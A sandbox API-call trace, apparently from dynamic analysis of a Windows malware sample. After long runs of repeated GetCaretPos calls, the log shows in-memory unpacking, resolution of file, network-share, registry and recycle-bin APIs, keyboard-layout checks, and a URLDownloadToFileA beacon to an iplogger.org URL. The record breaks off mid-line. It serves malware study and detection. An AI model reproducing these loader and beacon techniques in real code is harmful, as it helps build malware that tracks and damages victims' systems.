GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.687] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.688] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.689] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.690] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.963] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0023.963] LocalAlloc (uFlags=0x0, uBytes=0x8948) returned 0x296520 [0023.974] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0023.974] VirtualProtect (in: lpAddress=0x296520, dwSize=0x8948, flNewProtect=0x40, lpflOldProtect=0x18fa98 | out: lpflOldProtect=0x18fa98*=0x4) returned 1 [0023.990] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9 [0023.990] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0023.991] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0023.993] Module32First (hSnapshot=0x58, lpme=0x18e99c) returned 1 [0023.994] VirtualAlloc (lpAddress=0x0, dwSize=0xe650, flAllocationType=0x1000, flProtect=0x40) returned 0x1a0000 [0023.996] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0023.996] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0023.997] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0023.997] SetErrorMode (uMode=0x400) returned 0x0 [0023.997] SetErrorMode (uMode=0x0) returned 0x400 [0023.997] GetVersionExA (in: lpVersionInformation=0x18d8cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18d8cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0023.997] VirtualAlloc (lpAddress=0x0, dwSize=0xd800, flAllocationType=0x1000, flProtect=0x4) returned 0x1b0000 [0023.998] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18e954 | out: lpflOldProtect=0x18e954*=0x2) returned 1 [0024.000] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0024.001] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x75da0000 [0026.531] GetProcAddress (hModule=0x75da0000, lpProcName="URLDownloadToFileA") returned 0x75e368d0 [0026.531] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0026.531] GetProcAddress (hModule=0x75340000, lpProcName="wnsprintfA") returned 0x7536edae [0026.531] GetProcAddress (hModule=0x75340000, lpProcName="StrStrW") returned 0x7534e52d [0026.531] GetProcAddress (hModule=0x75340000, lpProcName="wnsprintfW") returned 0x7536ef87 [0026.531] LoadLibraryA (lpLibFileName="MSVCRT.dll") returned 0x74e10000 [0026.531] GetProcAddress (hModule=0x74e10000, lpProcName="memcpy") returned 0x74e19910 [0026.532] GetProcAddress (hModule=0x74e10000, lpProcName="memset") returned 0x74e19790 [0026.532] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0028.153] GetProcAddress (hModule=0x75fd0000, lpProcName="SHEmptyRecycleBinA") returned 0x7623f003 [0028.153] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74aa0000 [0028.247] GetProcAddress (hModule=0x74aa0000, lpProcName="WNetEnumResourceW") returned 0x74aa3058 [0028.247] GetProcAddress (hModule=0x74aa0000, lpProcName="WNetCloseEnum") returned 0x74aa2dd6 [0028.247] GetProcAddress (hModule=0x74aa0000, lpProcName="WNetOpenEnumW") returned 0x74aa2f06 [0028.248] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDriveStringsW") returned 0x76cb436f [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLangID") returned 0x76c4d5fd [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpW") returned 0x76c35929 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0028.248] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="QueueUserWorkItem") returned 0x76c4ca80 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedExchangeAdd") returned 0x76c4d39b [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0028.249] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0028.250] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0028.250] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0028.250] GetProcAddress (hModule=0x74f40000, lpProcName="GetKeyboardLayoutList") returned 0x74f62e69 [0028.250] GetProcAddress (hModule=0x74f40000, lpProcName="CharLowerW") returned 0x74f57647 [0028.250] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0028.250] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExA") returned 0x74d54907 [0028.250] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExA") returned 0x74d548ef [0028.250] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExA") returned 0x74d514b3 [0028.250] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0028.250] GetProcAddress (hModule=0x74d40000, lpProcName="RegCreateKeyA") returned 0x74d4cd01 [0028.250] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0028.250] GetProcAddress (hModule=0x755e0000, lpProcName="CoSetProxyBlanket") returned 0x755f5ea5 [0028.251] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0028.251] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0028.251] GetProcAddress (hModule=0x75220000, lpProcName=0x8) returned 0x75223ed5 [0028.251] GetProcAddress (hModule=0x75220000, lpProcName=0x9) returned 0x75223eae [0028.251] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749e0000 [0028.406] GetProcAddress (hModule=0x749e0000, lpProcName="atexit") returned 0x749fc544 [0028.406] atexit (param_1=0x1a0920) returned 0 [0028.408] GetUserDefaultLangID () returned 0x409 [0028.408] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0028.408] GetProcessHeap () returned 0x280000 [0028.408] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x29ee70 [0028.408] GetKeyboardLayoutList (in: nBuff=1, lpList=0x29ee70 | out: lpList=0x29ee70) returned 1 [0028.408] GetProcessHeap () returned 0x280000 [0028.408] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ee70 | out: hHeap=0x280000) returned 1 [0028.409] URLDownloadToFileA (param_1=0x0, param_2="https://iplogger.org/1Zqq77", param_3="ntos.database" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntos.database"), param_4=0x0, param_5=0x0) returned 0x800c0008 [0036.334] CoCreateInstance (in: rclsid=0x40c220*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x40c180*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x17e83c | out: ppv=0x17e83c*=0x82cc660) returned 0x0 [0036.892] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0036.892] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0036.893] GetCurrentProcess () returned 0xffffffff [0036.893] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x17e834 | out: Wow64Process=0x17e834) returned 1 [0036.893] WbemContext:IWbemContext:SetValue (This=0x82cc660, wszName="__ProviderArchitecture", lFlags=0, pValue=0x17e820*(varType=0x3, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x40, varVal2=0x76c314dc)) returned 0x0 [0036.893] CoCreateInstance (in: rclsid=0x40c210*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x40c140*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x17e830 | out: ppv=0x17e830*=0x82cc730) returned 0x0 [0036.973] WbemLocator:IWbemLocator:ConnectServer (in: This=0x82cc730, strNetworkResource="", 